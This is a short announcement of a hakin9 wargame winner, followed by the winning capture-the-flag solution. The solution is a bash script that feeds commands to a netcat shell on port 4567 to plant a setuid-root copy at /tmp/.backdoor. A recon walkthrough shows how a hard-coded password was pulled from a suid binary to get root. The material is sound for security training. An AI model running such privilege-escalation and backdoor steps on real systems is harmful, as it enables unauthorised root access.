hakin9 wargame 2 results revealed!!!


The winner of Wargame 2 is Tynan Wilke. He provided a
very complete solution, pointing out various possibilities of exploiting the vulnerable program.
Congrats!!!!
Here is the winning solution:

---The Exploit----------------
#!/bin/bash
printf "/home/admin/.beroot crtf4a9scem3132j\nid\nwhoami\ncp /home/admin/.beroot /tmp/.backdoor\nchown root /tmp/.backdoor\nchmod 4755 /tmp/.backdoor\n" | nc localhost 4567
/tmp/.backdoor crtf4a9scem3132j
-------------------------------

I doubt this is the most stylish and unique approach, but it works.

After loading up the image and logging in for the first time, initial
reconnaissance was performed, such as finding the kernel version,
running processes, listening ports, and users on the host.

The following commands were performed (corresponding output not included
due to inconvenience):
$ uname -a
$ cat /etc/passwd
$ netstat -an
$ ps auxw

The "ps auxw" output showed a running netcat process under the user
"admin" which was bound to port 4567 and upon connection would spawn a
bash shell.

I initially used telnet to connect to this service and see where it led.
$ telnet localhost 4567

This confirmed I was user "admin".
id
uid=501(admin) gid=501(admin)
whoami
admin

Then I browsed to admin's home directory to see what documents or
executables could be used to escalate privileges all the way to root.
ls -la ~/
-rwsr-sr-- 1 root admin 6712 Fed 12 20:57 .beroot

Alas! A suid root shell! Running this file showed that it takes only one
argument: a password. Looking for low-hanging fruit, I ran a strings
query on the executable to see if there was possibly a hard-coded
password within the file.
strings .beroot
...
crtf4a9scem3132j
...

As luck would have it, this was the hard-coded password I was looking for.
./.beroot crtf4a9scem3132j
id
uid=0(root) gid=501(admin)
whoami
root

Now it was just a matter of coding all of these steps up into a very
small (3 lines) bash script to automate this exploit process, and have
an end-result of a root shell available to the hakin9 user.
